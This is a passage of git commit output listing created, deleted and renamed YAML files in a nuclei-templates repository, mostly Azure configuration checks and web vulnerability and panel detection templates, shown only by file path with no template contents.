nuclei-templates/Other/azure-aks-entra-id-unintegrated.yaml create mode 100644 
nuclei-templates/Other/azure-aks-kubernetes-version-outdated.yaml create mode 100644 nuclei-templates/Other/azure-aks-managed-identity-unassigned.yaml create mode 100644 nuclei-templates/Other/azure-aks-network-contrib-unassigned.yaml create mode 100644 nuclei-templates/Other/azure-aks-not-user-assigned.yaml create mode 100644 nuclei-templates/Other/azure-aks-rbac-unconfigured.yaml create mode 100644 nuclei-templates/Other/azure-aks-use-private-kv.yaml create mode 100644 nuclei-templates/Other/azure-apim-http2-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-apim-https-enforcement-missing.yaml create mode 100644 nuclei-templates/Other/azure-apim-nv-plaintext-exposure.yaml create mode 100644 nuclei-templates/Other/azure-apim-public-access-disabled.yaml create mode 100644 nuclei-templates/Other/azure-apim-resource-logs-not-configured.yaml create mode 100644 nuclei-templates/Other/azure-apim-system-assigned-identity-unconfigured.yaml create mode 100644 nuclei-templates/Other/azure-apim-tls-config-weak.yaml create mode 100644 nuclei-templates/Other/azure-apim-user-assigned-id-not-used.yaml create mode 100644 nuclei-templates/Other/azure-app-tier-cmk-untagged.yaml create mode 100644 nuclei-templates/Other/azure-app-tier-vm-disk-unencrypted.yaml create mode 100644 nuclei-templates/Other/azure-appservice-always-on-disabled.yaml create mode 100644 nuclei-templates/Other/azure-appservice-auth-disabled.yaml create mode 100644 nuclei-templates/Other/azure-appservice-backup-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-appservice-backup-retention-missing.yaml create mode 100644 nuclei-templates/Other/azure-appservice-client-cert-disabled.yaml create mode 100644 nuclei-templates/Other/azure-appservice-entra-id-missing.yaml create mode 100644 nuclei-templates/Other/azure-appservice-ftp-deployment-disabled.yaml create mode 100644 nuclei-templates/Other/azure-appservice-ftps-only-not-enabled.yaml create mode 100644 
nuclei-templates/Other/azure-appservice-http2-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-appservice-https-only-not-enforced.yaml create mode 100644 nuclei-templates/Other/azure-appservice-insights-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-appservice-remote-debugging-enabled.yaml create mode 100644 nuclei-templates/Other/azure-appservice-tls-latest-version-missing.yaml create mode 100644 nuclei-templates/Other/azure-blob-anonymous-access-disabled.yaml create mode 100644 nuclei-templates/Other/azure-blob-immutable-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-blob-lifecycle-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-blob-service-logging-disabled.yaml create mode 100644 nuclei-templates/Other/azure-blob-soft-delete-disabled.yaml create mode 100644 nuclei-templates/Other/azure-budget-alerts-missing.yaml create mode 100644 nuclei-templates/Other/azure-cosmosdb-auto-failover-missing.yaml create mode 100644 nuclei-templates/Other/azure-cosmosdb-default-network-access-unrestricted.yaml create mode 100644 nuclei-templates/Other/azure-custom-admin-role-unrestricted.yaml create mode 100644 nuclei-templates/Other/azure-custom-owner-role-unrestricted.yaml create mode 100644 nuclei-templates/Other/azure-database-tier-cmk-absent.yaml create mode 100644 nuclei-templates/Other/azure-db-mysql-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-defender-auto-provisioning-disabled.yaml create mode 100644 nuclei-templates/Other/azure-delete-lb-alert-unconfigured.yaml create mode 100644 nuclei-templates/Other/azure-diag-logs-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-diagnostic-categories-misconfigured.yaml create mode 100644 nuclei-templates/Other/azure-disk-encryption-unattached-volumes.yaml create mode 100644 nuclei-templates/Other/azure-entra-id-guest-users-unmonitored.yaml create mode 100644 nuclei-templates/Other/azure-functionapp-access-keys-missing.yaml 
create mode 100644 nuclei-templates/Other/azure-functionapp-admin-privileges.yaml create mode 100644 nuclei-templates/Other/azure-functionapp-appinsights-missing.yaml create mode 100644 nuclei-templates/Other/azure-functionapp-public-exposure.yaml create mode 100644 nuclei-templates/Other/azure-functionapp-system-assigned-missing.yaml create mode 100644 nuclei-templates/Other/azure-functionapp-user-assigned-id-missing.yaml create mode 100644 nuclei-templates/Other/azure-functionapp-vnet-integration-missing.yaml create mode 100644 nuclei-templates/Other/azure-iam-role-resource-lock-unassigned.yaml create mode 100644 nuclei-templates/Other/azure-key-vault-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-audit-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-cert-keytype-unapproved.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-cert-transparency-missing.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-certificate-insufficient-autorenew.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-network-unrestricted.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-recoverability-unconfigured.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-resource-lock-check.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-ssl-autorenewal-missing.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-trusted-ms-unrestricted.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-lb-create-update-missing.yaml create mode 100644 nuclei-templates/Other/azure-lb-unused.yaml create mode 100644 nuclei-templates/Other/azure-log-profile-all-activities.yaml create mode 100644 nuclei-templates/Other/azure-mfa-not-enabled-privileged-users.yaml create mode 100644 nuclei-templates/Other/azure-monitor-diagnostic-unrestricted.yaml create mode 100644 
nuclei-templates/Other/azure-mysql-db-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-network-watcher.yaml create mode 100644 nuclei-templates/Other/azure-nic-ip-forwarding-check.yaml create mode 100644 nuclei-templates/Other/azure-nsg-create-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-nsg-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-nsg-rule-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-nsg-rule-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-openai-cmk-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-openai-managed-identity-not-used.yaml create mode 100644 nuclei-templates/Other/azure-openai-private-endpoints-unconfigured.yaml create mode 100644 nuclei-templates/Other/azure-openai-public-access-disabled.yaml create mode 100644 nuclei-templates/Other/azure-policy-assignment-create-alert-missing.yaml create mode 100644 nuclei-templates/Other/azure-policy-assignment-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-policy-not-allowed-types-unassigned.yaml create mode 100644 nuclei-templates/Other/azure-postgres-allow-azure-services-disabled.yaml create mode 100644 nuclei-templates/Other/azure-postgres-connection-throttling-disabled.yaml create mode 100644 nuclei-templates/Other/azure-postgres-double-encryption-disabled.yaml create mode 100644 nuclei-templates/Other/azure-postgres-log-checkpoints-disabled.yaml create mode 100644 nuclei-templates/Other/azure-postgres-log-connections-disabled.yaml create mode 100644 nuclei-templates/Other/azure-postgres-log-disconnections-disabled.yaml create mode 100644 nuclei-templates/Other/azure-postgres-log-duration-disabled.yaml create mode 100644 nuclei-templates/Other/azure-postgresql-db-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-postgresql-db-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-postgresql-geo-backup-disabled.yaml 
create mode 100644 nuclei-templates/Other/azure-postgresql-ssl-enforcement.yaml create mode 100644 nuclei-templates/Other/azure-postgresql-storage-autogrow-disabled.yaml create mode 100644 nuclei-templates/Other/azure-public-ip-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-public-ip-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-redis-nonssl-port-disabled.yaml create mode 100644 nuclei-templates/Other/azure-redis-tls-version-outdated.yaml create mode 100644 nuclei-templates/Other/azure-search-service-managed-identity-disabled.yaml create mode 100644 nuclei-templates/Other/azure-security-policy-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-security-solution-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-security-solutions-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-servicebus-public-access-disabled.yaml create mode 100644 nuclei-templates/Other/azure-servicebus-tls-version-outdated.yaml create mode 100644 nuclei-templates/Other/azure-sql-auditing-disabled.yaml create mode 100644 nuclei-templates/Other/azure-sql-database-rename-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-sql-db-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-sql-delete-db-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-sql-failover-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-sql-fw-rule-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-sql-mi-tde-cmk-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-sql-mi-tls-version-outdated.yaml create mode 100644 nuclei-templates/Other/azure-sql-tde-cmk-not-used.yaml create mode 100644 nuclei-templates/Other/azure-sql-tde-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-sql-va-emails-unconfigured.yaml create mode 100644 nuclei-templates/Other/azure-storage-account-delete-unalerted.yaml create mode 100644 
nuclei-templates/Other/azure-storage-account-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-storage-blob-public-access.yaml create mode 100644 nuclei-templates/Other/azure-storage-byok-not-used.yaml create mode 100644 nuclei-templates/Other/azure-storage-cmk-not-used.yaml create mode 100644 nuclei-templates/Other/azure-storage-cross-tenant-replication-disabled.yaml create mode 100644 nuclei-templates/Other/azure-storage-encryption-missing.yaml create mode 100644 nuclei-templates/Other/azure-storage-min-tls-version.yaml create mode 100644 nuclei-templates/Other/azure-storage-network-unrestricted.yaml create mode 100644 nuclei-templates/Other/azure-storage-overly-permissive-sap.yaml create mode 100644 nuclei-templates/Other/azure-storage-private-endpoint-unconfigured.yaml create mode 100644 nuclei-templates/Other/azure-storage-public-access.yaml create mode 100644 nuclei-templates/Other/azure-storage-queue-logging-disabled.yaml create mode 100644 nuclei-templates/Other/azure-storage-secure-transfer.yaml create mode 100644 nuclei-templates/Other/azure-storage-static-website-review.yaml create mode 100644 nuclei-templates/Other/azure-storage-table-logging-disabled.yaml create mode 100644 nuclei-templates/Other/azure-storage-trusted-access-disabled.yaml create mode 100644 nuclei-templates/Other/azure-synapse-sqlpool-tde-disabled.yaml create mode 100644 nuclei-templates/Other/azure-takeover-detection-681.yaml delete mode 100644 nuclei-templates/Other/azure-takeover-detection-683.yaml create mode 100644 nuclei-templates/Other/azure-vm-accelerated-networking-disabled.yaml create mode 100644 nuclei-templates/Other/azure-vm-accelerated-networking-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-vm-boot-diagnostics-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-vm-boot-disk-unencrypted.yaml create mode 100644 nuclei-templates/Other/azure-vm-byok-disk-volumes-not-enabled.yaml create mode 100644 
nuclei-templates/Other/azure-vm-create-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-vm-deallocate-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-vm-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-vm-endpoint-protection-missing.yaml create mode 100644 nuclei-templates/Other/azure-vm-entra-id-unenabled.yaml create mode 100644 nuclei-templates/Other/azure-vm-guest-diagnostics-unenabled.yaml create mode 100644 nuclei-templates/Other/azure-vm-jit-access-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-vm-managed-identity-unassigned.yaml create mode 100644 nuclei-templates/Other/azure-vm-performance-diagnostics-unenabled.yaml create mode 100644 nuclei-templates/Other/azure-vm-poweroff-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-vm-ssh-auth-type.yaml create mode 100644 nuclei-templates/Other/azure-vm-standard-ssd-required.yaml create mode 100644 nuclei-templates/Other/azure-vm-tags-schema-noncompliant.yaml create mode 100644 nuclei-templates/Other/azure-vm-trusted-launch-disabled.yaml create mode 100644 nuclei-templates/Other/azure-vm-unapproved-image.yaml create mode 100644 nuclei-templates/Other/azure-vm-unmanaged-disk-volumes.yaml create mode 100644 nuclei-templates/Other/azure-vm-web-tier-disk-unencrypted.yaml create mode 100644 nuclei-templates/Other/azure-vmss-auto-os-upgrade-missing.yaml create mode 100644 nuclei-templates/Other/azure-vmss-auto-repairs-disabled.yaml create mode 100644 nuclei-templates/Other/azure-vmss-empty-unattached.yaml create mode 100644 nuclei-templates/Other/azure-vmss-health-monitoring-missing.yaml create mode 100644 nuclei-templates/Other/azure-vmss-load-balancer-unassociated.yaml create mode 100644 nuclei-templates/Other/azure-vmss-public-ip-disabled.yaml create mode 100644 nuclei-templates/Other/azure-vmss-termination-notif-disabled.yaml create mode 100644 nuclei-templates/Other/azure-vmss-zone-redundancy-missing.yaml create mode 100644 
nuclei-templates/Other/azure-vnet-ddos-protection.yaml create mode 100644 nuclei-templates/Other/bagisto.yaml rename nuclei-templates/Other/{barracuda-panel-684.yaml => barracuda-panel-686.yaml} (100%) rename nuclei-templates/Other/{bash.yaml => bash-scanner.yaml} (100%) rename nuclei-templates/Other/{basic-auth-detection.yaml => basic-auth-detection-687.yaml} (100%) delete mode 100644 nuclei-templates/Other/basic-xss-prober-695.yaml create mode 100644 nuclei-templates/Other/basic-xss-prober-698.yaml create mode 100644 nuclei-templates/Other/bazarr-login-703.yaml delete mode 100644 nuclei-templates/Other/bazarr-login.yaml create mode 100644 nuclei-templates/Other/beauty.yaml create mode 100644 nuclei-templates/Other/bems-api-lfi-709.yaml delete mode 100644 nuclei-templates/Other/bems-api-lfi-710.yaml rename nuclei-templates/Other/{beward-ipcamera-disclosure-717.yaml => beward-ipcamera-disclosure-715.yaml} (100%) rename nuclei-templates/Other/{bigbluebutton-login-724.yaml => bigbluebutton-login-725.yaml} (100%) delete mode 100644 nuclei-templates/Other/bigip-config-utility-detect-730.yaml create mode 100644 nuclei-templates/Other/bigip-config-utility-detect-733.yaml rename nuclei-templates/Other/{bigip-detection-735.yaml => bigip-detection.yaml} (100%) rename nuclei-templates/Other/{biometric-detect-736.yaml => biometric-detect-737.yaml} (100%) delete mode 100644 nuclei-templates/Other/bitbucket-takeover-738.yaml create mode 100644 nuclei-templates/Other/bitbucket-takeover-741.yaml create mode 100644 nuclei-templates/Other/bitrix-open-redirect-745.yaml delete mode 100644 nuclei-templates/Other/bitrix-open-redirect.yaml create mode 100644 nuclei-templates/Other/bitrix-panel-748.yaml delete mode 100644 nuclei-templates/Other/bitrix-panel-750.yaml delete mode 100644 nuclei-templates/Other/blind-oast-polyglots.yaml delete mode 100644 nuclei-templates/Other/blue-ocean-excellence-lfi-756.yaml create mode 100644 nuclei-templates/Other/blue-ocean-excellence-lfi.yaml create 
mode 100644 nuclei-templates/Other/bolt-cms-panel-762.yaml delete mode 100644 nuclei-templates/Other/bolt-cms-panel-763.yaml delete mode 100644 nuclei-templates/Other/bookstack-detect-765.yaml create mode 100644 nuclei-templates/Other/bookstack-detect.yaml delete mode 100755 nuclei-templates/Other/braintree-access-token-771.yaml create mode 100644 nuclei-templates/Other/braintree-access-token.yaml create mode 100644 nuclei-templates/Other/branch-key-774.yaml delete mode 100644 nuclei-templates/Other/branch-key.yaml create mode 100644 nuclei-templates/Other/brandfolder-lfi-776.yaml delete mode 100644 nuclei-templates/Other/brandfolder-lfi.yaml delete mode 100644 nuclei-templates/Other/brightcove-takeover-783.yaml create mode 100644 nuclei-templates/Other/brightcove-takeover-784.yaml delete mode 100644 nuclei-templates/Other/brother-printer-detect-788.yaml create mode 100644 nuclei-templates/Other/brother-printer-detect-789.yaml rename nuclei-templates/Other/{brother-unauthorized-access.yaml => brother-unauthorized-access-792.yaml} (100%) rename nuclei-templates/Other/{browserless-debugger.yaml => browserless-debugger-794.yaml} (100%) create mode 100644 nuclei-templates/Other/buddy-panel-796.yaml delete mode 100644 nuclei-templates/Other/buddy-panel.yaml rename nuclei-templates/Other/{buffalo-config-injection-801.yaml => buffalo-config-injection-798.yaml} (100%) rename nuclei-templates/Other/{buildbot-panel-802.yaml => buildbot-panel.yaml} (100%) delete mode 100644 nuclei-templates/Other/businessintelligence-default-login-814.yaml create mode 100644 nuclei-templates/Other/businessintelligence-default-login-817.yaml rename nuclei-templates/Other/{api-buttercms-403.yaml => buttercms.yaml} (100%) delete mode 100644 nuclei-templates/Other/cab-fare-calculator-lfi-818.yaml create mode 100644 nuclei-templates/Other/cab-fare-calculator-lfi-819.yaml create mode 100644 nuclei-templates/Other/cache-poisoning-823.yaml delete mode 100644 
nuclei-templates/Other/cache-poisoning-825.yaml create mode 100644 nuclei-templates/Other/cacti-panel-828.yaml delete mode 100644 nuclei-templates/Other/cacti-panel-829.yaml delete mode 100644 nuclei-templates/Other/cacti-weathermap-file-write-832.yaml create mode 100644 nuclei-templates/Other/cacti-weathermap-file-write.yaml create mode 100644 nuclei-templates/Other/caddy-open-redirect-837.yaml delete mode 100644 nuclei-templates/Other/caddy-open-redirect.yaml create mode 100644 nuclei-templates/Other/calibre.yaml create mode 100644 nuclei-templates/Other/call-break-cms-840.yaml delete mode 100644 nuclei-templates/Other/call-break-cms.yaml create mode 100644 nuclei-templates/Other/camera_firmware.yaml create mode 100644 nuclei-templates/Other/campaignmonitor-843.yaml delete mode 100644 nuclei-templates/Other/campaignmonitor.yaml rename nuclei-templates/Other/{camunda-login-panel-845.yaml => camunda-login-panel.yaml} (100%) delete mode 100644 nuclei-templates/Other/canal-default-login-846.yaml create mode 100644 nuclei-templates/Other/canal-default-login.yaml create mode 100644 nuclei-templates/Other/canny-takeover-854.yaml delete mode 100644 nuclei-templates/Other/canny-takeover-857.yaml rename nuclei-templates/Other/{cargo-takeover-867.yaml => cargo-takeover-869.yaml} (100%) create mode 100644 nuclei-templates/Other/cargocollective-takeover-864.yaml delete mode 100644 nuclei-templates/Other/cargocollective-takeover-865.yaml create mode 100644 nuclei-templates/Other/cdg.yaml rename nuclei-templates/Other/{3833918288.yaml => ceph.yaml} (100%) create mode 100644 nuclei-templates/Other/cercopitheque.yaml create mode 100644 nuclei-templates/Other/cerebro-panel-878.yaml delete mode 100644 nuclei-templates/Other/cerebro-panel-881.yaml rename nuclei-templates/Other/{certificate-validation-882.yaml => certificate-validation-883.yaml} (100%) delete mode 100644 nuclei-templates/Other/cgi-printenv-886.yaml create mode 100644 nuclei-templates/Other/cgi-printenv.yaml delete 
mode 100644 nuclei-templates/Other/cgi-test-page-888.yaml create mode 100644 nuclei-templates/Other/cgi-test-page-890.yaml rename nuclei-templates/Other/{chamilo-lms-xss.yaml => chamilo-lms-xss-893.yaml} (100%) rename nuclei-templates/Other/{chanjet-CRM-sqli.yaml => chanjet-crm-sqli.yaml} (100%) create mode 100644 nuclei-templates/Other/chatgpt_web.yaml create mode 100644 nuclei-templates/Other/checkmarx-panel-897.yaml delete mode 100644 nuclei-templates/Other/checkmarx-panel.yaml rename nuclei-templates/Other/{checkpoint-panel-899.yaml => checkpoint-panel-898.yaml} (100%) delete mode 100644 nuclei-templates/Other/cherry-file-download-900.yaml create mode 100644 nuclei-templates/Other/cherry-file-download.yaml delete mode 100644 nuclei-templates/Other/church-admin-lfi-914.yaml create mode 100644 nuclei-templates/Other/church-admin-lfi.yaml delete mode 100644 nuclei-templates/Other/circarlife-setup-917.yaml create mode 100644 nuclei-templates/Other/circarlife-setup-921.yaml delete mode 100644 nuclei-templates/Other/circleci-config-923.yaml create mode 100644 nuclei-templates/Other/circleci-config-924.yaml delete mode 100644 nuclei-templates/Other/circleci-ssh-config-927.yaml create mode 100644 nuclei-templates/Other/circleci-ssh-config-928.yaml rename nuclei-templates/Other/{api-circleci.yaml => circleci.yaml} (100%) rename nuclei-templates/Other/{cisco-finesse-login-940.yaml => cisco-finesse-login.yaml} (100%) create mode 100644 nuclei-templates/Other/cisco-meraki-exposure-944.yaml delete mode 100644 nuclei-templates/Other/cisco-meraki-exposure-946.yaml create mode 100644 nuclei-templates/Other/cisco-sd-wan-957.yaml delete mode 100644 nuclei-templates/Other/cisco-sd-wan.yaml rename nuclei-templates/Other/{cisco-security-details-963.yaml => cisco-security-details.yaml} (100%) create mode 100644 nuclei-templates/Other/cisco-sendgrid-968.yaml delete mode 100644 nuclei-templates/Other/cisco-sendgrid-969.yaml delete mode 100644 
nuclei-templates/Other/cisco-smi-exposure-970.yaml create mode 100644 nuclei-templates/Other/cisco-smi-exposure-971.yaml rename nuclei-templates/Other/{cisco-systems-login-975.yaml => cisco-systems-login.yaml} (100%) create mode 100644 nuclei-templates/Other/cisco-ucs-kvm-login-979.yaml delete mode 100644 nuclei-templates/Other/cisco-ucs-kvm-login.yaml rename nuclei-templates/Other/{citrix-adc-gateway-detect-983.yaml => citrix-adc-gateway-detect-981.yaml} (100%) rename nuclei-templates/Other/{ckan-dom-based-xss.yaml => ckan-dom-based-xss-993.yaml} (100%) create mode 100644 nuclei-templates/Other/ckan.yaml rename nuclei-templates/Other/{CL-TE-http-smuggling.yaml => cl-te-http-smuggling.yaml} (100%) rename nuclei-templates/Other/{clearpass-policy-manager-997.yaml => clearpass-policy-manager-1001.yaml} (100%) delete mode 100644 nuclei-templates/Other/clickhouse-unauth-1002.yaml create mode 100644 nuclei-templates/Other/clickhouse-unauth-1003.yaml create mode 100644 nuclei-templates/Other/clickshare_cs-100_huddle_firmware.yaml rename nuclei-templates/Other/{clientaccesspolicy-1005.yaml => clientaccesspolicy-1006.yaml} (100%) delete mode 100644 nuclei-templates/Other/clockwork-dashboard-exposure-1012.yaml create mode 100644 nuclei-templates/Other/clockwork-dashboard-exposure-1015.yaml delete mode 100644 nuclei-templates/Other/clockwork-php-page-1018.yaml create mode 100644 nuclei-templates/Other/clockwork-php-page-1019.yaml create mode 100644 nuclei-templates/Other/cloud_foundation.yaml rename nuclei-templates/Other/{cloudflare-image-ssrf-1023.yaml => cloudflare-image-ssrf-1022.yaml} (100%) create mode 100644 nuclei-templates/Other/cloudstack.yaml rename nuclei-templates/Other/{cname-service-detection.yaml => cname-service-detection-1032.yaml} (100%) delete mode 100644 nuclei-templates/Other/cname-service-detector-1033.yaml create mode 100644 nuclei-templates/Other/cname-service-detector-1034.yaml delete mode 100644 nuclei-templates/Other/cnnvd-200705-315-1035.yaml 
rename nuclei-templates/Other/{cnvd-2019-06255-1050.yaml => cnvd-2019-06255-1046.yaml} (100%) delete mode 100644 nuclei-templates/Other/cnvd-2019-19299-1051.yaml delete mode 100644 nuclei-templates/Other/cnvd-2020-23735-1058.yaml create mode 100644 nuclei-templates/Other/cnvd-2020-46552-1060.yaml rename nuclei-templates/Other/{CNVD-2020-56167.yaml => cnvd-2020-56167-1061.yaml} (100%) create mode 100644 nuclei-templates/Other/cnvd-2020-67113-1071.yaml create mode 100644 nuclei-templates/Other/cnvd-2020-68596-1075.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-01931-1077.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-10543-1084.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-14536-1087.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-15822-1095.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-15824-1097.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-17369-1098.yaml rename nuclei-templates/Other/{CNVD-2021-28277.yaml => cnvd-2021-28277-1105.yaml} (100%) create mode 100644 nuclei-templates/Other/cnvd-2021-30167-1110.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-30167-1112.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-49104-1115.yaml rename nuclei-templates/Other/{cockpit-workflow-1129.yaml => cockpit-workflow.yaml} (100%) create mode 100644 nuclei-templates/Other/code42-log4j-rce-1131.yaml delete mode 100644 nuclei-templates/Other/code42-log4j-rce.yaml create mode 100644 nuclei-templates/Other/codeigniter-env-1134.yaml delete mode 100644 nuclei-templates/Other/codeigniter-env.yaml create mode 100644 nuclei-templates/Other/cofense-vision-detection.yaml delete mode 100644 nuclei-templates/Other/cofense-vision-panel.yaml rename nuclei-templates/Other/{cold-fusion-cfcache-map-1149.yaml => cold-fusion-cfcache-map.yaml} (100%) create mode 100644 nuclei-templates/Other/coldfusion-administrator-login-1146.yaml delete mode 100644 nuclei-templates/Other/coldfusion-administrator-login.yaml create mode 
100644 nuclei-templates/Other/coldfusion-debug-xss-1154.yaml delete mode 100644 nuclei-templates/Other/coldfusion-debug-xss-1155.yaml create mode 100644 nuclei-templates/Other/commax-credentials-disclosure-1160.yaml delete mode 100644 nuclei-templates/Other/commax-credentials-disclosure.yaml delete mode 100644 nuclei-templates/Other/compal-panel.yaml create mode 100644 nuclei-templates/Other/compal.yaml delete mode 100644 nuclei-templates/Other/comtrend-password-exposure-1168.yaml create mode 100644 nuclei-templates/Other/comtrend-password-exposure.yaml delete mode 100644 nuclei-templates/Other/concourse-ci-panel-1170.yaml create mode 100644 nuclei-templates/Other/concourse-ci-panel.yaml rename nuclei-templates/Other/{concrete-xss-1176.yaml => concrete-xss-1177.yaml} (100%) rename nuclei-templates/Other/{configuration-listing-1182.yaml => configuration-listing-1184.yaml} (100%) rename nuclei-templates/Other/{confluence-detect.yaml => confluence-detect-1186.yaml} (100%) create mode 100644 nuclei-templates/Other/confluence-ssrf-sharelinks-1191.yaml delete mode 100644 nuclei-templates/Other/confluence-ssrf-sharelinks-1192.yaml create mode 100644 nuclei-templates/Other/connection_broker.yaml delete mode 100644 nuclei-templates/Other/contact-form-7-plugin.yaml create mode 100644 nuclei-templates/Other/contact-form-7.yaml delete mode 100644 nuclei-templates/Other/cookie-injection.yaml delete mode 100644 nuclei-templates/Other/core-chuangtian-cloud-rce-1210.yaml create mode 100644 nuclei-templates/Other/core-chuangtian-cloud-rce-1212.yaml create mode 100644 nuclei-templates/Other/coremail-config-disclosure-1215.yaml delete mode 100644 nuclei-templates/Other/coremail-config-disclosure.yaml rename nuclei-templates/Other/{cors-misconfig-1222.yaml => cors-misconfig-1221.yaml} (100%) delete mode 100644 nuclei-templates/Other/cortex-xsoar-login-1227.yaml create mode 100644 nuclei-templates/Other/cortex-xsoar-login-1229.yaml rename 
nuclei-templates/Other/{couchbase-buckets-api-1233.yaml => couchbase-buckets-api.yaml} (100%) delete mode 100644 nuclei-templates/Other/couchdb-adminparty-1234.yaml create mode 100644 nuclei-templates/Other/couchdb-adminparty-1237.yaml create mode 100644 nuclei-templates/Other/craft-cms-detect-1247.yaml delete mode 100644 nuclei-templates/Other/craft-cms-detect.yaml rename nuclei-templates/Other/{craftcms-admin-panel.yaml => craftcms-admin-panel-1245.yaml} (100%) delete mode 100644 nuclei-templates/Other/credentials-1257.yaml delete mode 100644 nuclei-templates/Other/credentials-disclosure-1252.yaml create mode 100644 nuclei-templates/Other/credentials-disclosure-1255.yaml create mode 100644 nuclei-templates/Other/credentials.yaml create mode 100644 nuclei-templates/Other/crmeb.yaml create mode 100644 nuclei-templates/Other/cs-cart-unauthenticated-lfi-1285.yaml delete mode 100644 nuclei-templates/Other/cs-cart-unauthenticated-lfi.yaml create mode 100644 nuclei-templates/Other/cs141.yaml rename nuclei-templates/Other/{csod-panel.yaml => csod-panel-1286.yaml} (100%) create mode 100644 nuclei-templates/Other/csrfguard-detect-1290.yaml delete mode 100644 nuclei-templates/Other/csrfguard-detect-1291.yaml create mode 100644 nuclei-templates/Other/custom-data-result-service-detect.yaml delete mode 100644 nuclei-templates/Other/custom-datadump-source-code-detect.yaml create mode 100644 nuclei-templates/Other/custom-post-limits.yaml delete mode 100644 nuclei-templates/Other/custom-solr-file-read.yaml delete mode 100644 nuclei-templates/Other/custom-swagger-ui-detect.yaml create mode 100644 nuclei-templates/Other/custom-xss-check.yaml delete mode 100644 nuclei-templates/Other/custom_nuclei-5.yaml create mode 100644 nuclei-templates/Other/custom_nuclei-8.yaml delete mode 100644 nuclei-templates/Other/d-link-arbitary-fileread-7044.yaml create mode 100644 nuclei-templates/Other/d-link-arbitary-fileread-7045.yaml delete mode 100644 
nuclei-templates/Other/d-link-wireless-7050.yaml create mode 100644 nuclei-templates/Other/d-link-wireless.yaml create mode 100644 nuclei-templates/Other/data_science_studio.yaml rename nuclei-templates/Other/{database-error-6768.yaml => database-error-6771.yaml} (100%) create mode 100644 nuclei-templates/Other/dataease.yaml create mode 100644 nuclei-templates/Other/datahub.yaml delete mode 100644 nuclei-templates/Other/daybyday-detect-6772.yaml create mode 100644 nuclei-templates/Other/daybyday-detect.yaml create mode 100644 nuclei-templates/Other/db-backup-lfi-6776.yaml delete mode 100644 nuclei-templates/Other/db-backup-lfi.yaml rename nuclei-templates/Other/{dead-host-with-cname.yaml => dead-host-with-cname-6787.yaml} (100%) rename nuclei-templates/Other/{debug-enabled-6790.yaml => debug-enabled-6788.yaml} (100%) delete mode 100644 nuclei-templates/Other/dedecms-carbuyaction-fileinclude-6793.yaml create mode 100644 nuclei-templates/Other/dedecms-carbuyaction-fileinclude-6794.yaml create mode 100644 nuclei-templates/Other/dedecms-membergroup-sqli-6796.yaml delete mode 100644 nuclei-templates/Other/dedecms-membergroup-sqli.yaml rename nuclei-templates/Other/{dedecms-openredirect-6802.yaml => dedecms-openredirect-6803.yaml} (100%) rename nuclei-templates/Other/{default-apache-test-all.yaml => default-apache-test-all-6814.yaml} (100%) create mode 100644 nuclei-templates/Other/default-apache-test-page-6818.yaml delete mode 100644 nuclei-templates/Other/default-apache-test-page.yaml create mode 100644 nuclei-templates/Other/default-apache2-ubuntu-page-6809.yaml delete mode 100644 nuclei-templates/Other/default-apache2-ubuntu-page.yaml create mode 100644 nuclei-templates/Other/default-asp-net-page-6822.yaml delete mode 100644 nuclei-templates/Other/default-asp-net-page.yaml create mode 100644 nuclei-templates/Other/default-codeigniter-page-6833.yaml delete mode 100644 nuclei-templates/Other/default-codeigniter-page.yaml rename 
